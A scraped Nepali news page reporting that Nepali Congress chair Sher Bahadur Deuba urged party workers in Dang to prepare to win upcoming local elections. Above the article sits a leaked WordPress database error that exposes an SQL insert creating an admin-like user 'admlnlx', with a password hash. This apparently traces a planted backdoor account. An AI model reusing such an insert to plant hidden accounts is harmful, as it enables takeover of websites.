WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bkw/aTT3ORvpbgnBcedNiRwyWO6VgG.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 12:13:20', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ १३-
नेपाली कांग्रेसका सभापति शेरबहादुर देउवाले स्थानीय निकायको निर्वाचनको तयारीमा लाग्न कार्यकर्तालाई निर्देशन दिएका छन् ।
अबको एक हप्ताभित्रै स्थानीय निकायको मिति घोषणा हुने भन्दै उनले बिहीबार दाङका नेपाली कांग्रेसका नेता तथा कार्यकर्तालाई भेट्दै यस्तो निर्देशन दिएका हुन ।
चुनाव जित्ने गरि जिल्ला तहमा सकृयता बढाउन निर्देशन दिँदै उनले भने, – ‘स्थानीय निर्वाचनको तयारीमा कम्मर कसेर लाग्नुस, कांग्रेसले स्थानीय निर्वाचन जितेको हुनुपर्छ, त्यहिअनुसार माहोल बनाउन लाग्नुस् ।’
मुलुकको निकासको प्रमुख कार्यभार कांग्रेसकै काँधमा रहेको भन्दै उनले यसका लागि स्थानीय तहको निर्वाचनमा कांग्रेसको जित सुनिश्चित हुनुपर्ने बताए । ‘मुलुकको कार्यभार कांग्रेसको काँधमा छ,’ उनले भने ‘मुलुकलाई निकास दिनका लागि पनि स्थानीय निर्वाचनमा कांग्रेसले जितेकै हुनुपर्छ ।’